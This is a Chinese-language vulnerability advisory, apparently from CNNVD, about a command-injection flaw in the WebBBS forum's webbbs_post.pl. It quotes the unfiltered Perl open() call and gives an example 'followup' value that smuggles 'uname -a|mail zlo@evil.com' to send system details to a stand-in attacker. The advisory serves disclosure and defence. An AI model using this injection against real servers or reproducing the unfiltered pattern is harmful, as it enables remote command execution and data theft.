WebScripts WebBBS远程命令执行漏洞

漏洞信息详情

WebScripts WebBBS远程命令执行漏洞

漏洞简介

WebBBS是一款由Darryl Burgdorf维护的基于WEB的论坛程序,以简单文本文件存储信息。
WebBBS脚本对用户提交的输入缺少正确的过滤,远程攻击者可以利用这个漏洞以WEB进程的权限在系统上执行任意命令。
WebBBS没有正确过滤来自CGI参数上的元字符,攻击者可以提交包含\”;\”或者\”|\”等元字符来执行额外命令,问题存在于webbbs_post.pl脚本中:
if ($FORM{\’\’followup\’\’}) { $followup =
\”$FORM{\’\’followup\’\’}\”; }

if ($followup) {

$subdir = \”bbs\”.int($followup/1000);
open
(FOLLOWUP,\”$dir/$subdir/$followup\”);

使用如\”followup=10;uname -a|mail zlo@evil.com|\”代替\”followup=10\”变量就可能以WEB权限在系统上执行任意命令。

漏洞公告

临时解决方法:
如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:

* 修改程序,严格过滤用户输入数据。
厂商补丁:
WebScripts
———-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://awsd.com/scripts/webbbs/” target=”_blank”>
http://awsd.com/scripts/webbbs/

参考网址

来源: BID
名称: 5048
链接:http://www.securityfocus.com/bid/5048

来源: XF
名称: webbs-followup-execute-commands(9378)
链接:http://www.iss.net/security_center/static/9378.php

来源: BUGTRAQ
名称: 20020618 WebBBS 5.0 (andlater versions) vulnerable: allow commands execution via “followup” bug
链接:http://cert.uni-stuttgart.de/archive/bugtraq/2002/06/msg00232.html

来源:NSFOCUS
名称:3018
链接:http://www.nsfocus.net/vulndb/3018

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享